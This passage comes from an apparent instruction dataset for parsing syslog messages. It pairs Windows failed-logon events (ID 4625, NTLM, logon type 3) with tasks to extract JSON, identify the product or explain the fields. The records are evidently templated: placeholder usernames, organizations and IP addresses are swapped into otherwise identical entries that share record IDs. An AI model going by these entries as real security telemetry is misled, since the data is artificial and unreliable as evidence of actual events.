Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"wayne\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"65.144.153.227\",\"IpPort\":\"54979\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"johndoe\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":2060}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6122059274,\"task\":\"Logon\"}}",
"messagetype": "auth_failure",
"productids": [
6
],
"senderhost": "10.87.1.30",
"sensitivity": "normal",
"severitylabel": "Info",
"sourceinfo": "unknown",
"tags": [
"v8",
"eventId:4625",
"microsoft-windows-security-auditing",
"auth_failure"
],
"vendorcode": "6122059274",
"streamName": "microsoft-windows-security-auditing",
"clientIP": "65.144.153.227",
"userName": "johndoe"
} | Create a JSON artifact from the message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t65.144.153.227\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"65.144.153.227","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | Product: Windows Active Directory
Vendor: Microsoft | Identify this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t65.144.153.227\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"65.144.153.227","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message:
action: Logon
clientport: 54979
messagetype: auth_failure
productids: [6]
senderhost: 10.87.1.30
sensitivity: normal
severitylabel: Info
sourceinfo: unknown
tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure']
vendorcode: 6122059274
streamName: microsoft-windows-security-auditing
clientIP: 65.144.153.227
userName: johndoe | Explain this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t12.184.62.213\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"umbrella","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"12.184.62.213","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | {
"action": "Logon",
"clientport": 61238,
"message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-17T18:11:48.924Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-17T18:11:50.394Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\tbob\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t12.184.62.213\\n\\tSource Port:\\t\\t61238\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"umbrella\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"12.184.62.213\",\"IpPort\":\"61238\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"bob\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":13644}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6082954626,\"task\":\"Logon\"}}",
"messagetype": "auth_failure",
"productids": [
6
],
"senderhost": "10.87.1.30",
"sensitivity": "normal",
"severitylabel": "Info",
"sourceinfo": "unknown",
"tags": [
"v8",
"eventId:4625",
"microsoft-windows-security-auditing",
"auth_failure"
],
"vendorcode": "6082954626",
"streamName": "microsoft-windows-security-auditing",
"clientIP": "12.184.62.213",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t12.184.62.213\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"umbrella","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"12.184.62.213","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | Product: Windows Active Directory
Vendor: Microsoft | Identify this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t12.184.62.213\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"umbrella","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"12.184.62.213","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message:
action: Logon
clientport: 61238
messagetype: auth_failure
productids: [6]
senderhost: 10.87.1.30
sensitivity: normal
severitylabel: Info
sourceinfo: unknown
tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure']
vendorcode: 6082954626
streamName: microsoft-windows-security-auditing
clientIP: 12.184.62.213
userName: bob | Explain this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t99.159.217.100\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"99.159.217.100","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | {
"action": "Logon",
"clientport": 61238,
"message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-17T18:11:48.924Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-17T18:11:50.394Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\talice\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t99.159.217.100\\n\\tSource Port:\\t\\t61238\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was 